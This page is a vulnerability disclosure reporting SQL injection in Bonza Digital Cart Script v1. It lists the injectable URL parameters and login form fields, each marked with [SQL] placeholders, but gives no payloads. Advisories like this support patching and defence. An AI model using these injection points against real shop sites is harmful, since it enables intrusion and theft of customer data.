Bonza Digital Cart Script 1 SQL Injection

2017.03.24
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ #Title: Bonza Digital Cart Script v1 - SQL injection #Credit: Bilal KARDADOU #Vendor: http://www.turnkeycentral.com #Vendor URL: http://www.turnkeycentral.com/scripts/bonza-digital-cart-script/ #Product: Bonza Digital Cart Script v1 #Google Dork: N/A ################################################ # # Product & Service Introduction: # # "Bonza Digital Cart" # Bonza Cart is the perfect solution for Paypal merchants offering downloadable (eGoods) # and tangible goods for sale who need a full featured storefront& shopping cart, # secure automated file delivery system & powerful administration backend all in one! # # http://localhost/bonzacart/viewitem.php?ItemID=6[SQL] # http://localhost/bonzacart/showcatrows.php?CategoryID=4[SQL] # http://localhost/bonzacart/cms_pages.php?pn=Disclaimer[SQL] # http://localhost/bonzacart/showcatrows.php?CategoryID=2&SubcategoryID=3[SQL] # http://localhost/bonzacart/searchresults.php?SearchTerm=admin[SQL]&ord1=ItemName&ord2=desc[SQL]&search1.x&search1.y&where=ItemDescription[SQL] # # http://localhost/bonzacart/checkout.php?cmd=login # uname=admin[SQL]&upass=adin&submit.x=0&submit.y=0 # # PoC: # http://prnt.sc/en5vqv # http://prnt.sc/en5vxx # http://prnt.sc/en5w7t # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################ -- *Bilal Kardadou* IT Security Consultant *E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top